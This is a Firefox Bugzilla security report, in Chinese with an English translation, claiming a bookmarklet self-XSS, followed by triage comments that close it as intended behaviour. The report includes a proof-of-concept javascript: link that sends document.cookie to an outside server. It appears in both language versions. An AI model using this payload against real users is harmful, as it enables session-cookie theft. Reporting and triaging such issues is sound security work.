火狐浏览器xss漏洞 (bookmarklet self-xss)
Categories
(Firefox :: Security, defect)
Tracking
()
People
(Reporter: a1406339013, Unassigned)
Details
(Keywords: reporter-external, Whiteboard: [reporter-external] [client-bounty-form] [verif?])
这个漏洞我提交过一次,在https://bugzilla.mozilla.org/show_bug.cgi?id=1628187上,你们给我的回答是,物理攻击不在危险模型内,但是我现在想到了新的攻击方式,不需要任何物理接触
您可以看下演示视频吗:
https://drive.google.com/open?id=1T0iYzJWkzMNP_RUR1NUoIXeXmu4Z0gjh
poc:
http://www.10000wen.com/xin.html
poc源码:
<a href='javascript:location=%22http%3a%2f%2fwww.10000wen.com%2fcookie.php%3fcookie%3d%27%22%2bdocument.cookie%2b%22%27%22%3b'>11111111111111111111111111111111111</a>
[below from Google translate --edited by dveditz
I submitted this vulnerability once. At https://bugzilla.mozilla.org/show_bug.cgi?id=1628187, the answer you gave me was that the physical attack is not in the dangerous model, but I now think of a new attack method Without any physical contact
Can you watch the demo video:
https://drive.google.com/open?id=1T0iYzJWkzMNP_RUR1NUoIXeXmu4Z0gjh
poc:
http://www.10000wen.com/xin.html
poc source code:
<a href='javascript:location=%22http%3a%2f%2fwww.10000wen.com%2fcookie.php%3fcookie%3d%27%22%2bdocument.cookie%2b%22%27%22%3b'> 11111111111111111111111111111111111 </a>
]
|
||
Updated•6 years ago
|
|
|
||
Comment 1•6 years ago
|
||
Watching the movie it looks like:
- convince victim to right-click bookmark a javascript: link
- convince victim to use the bookmark on a sensitive site
This is called a "bookmarklet" and is an intentional feature. https://en.wikipedia.org/wiki/Bookmarklet
|
||
Comment 2•5 years ago
|
||
bounty- as this is an intentional design feature
|
||
Updated•1 year ago
|
Description
•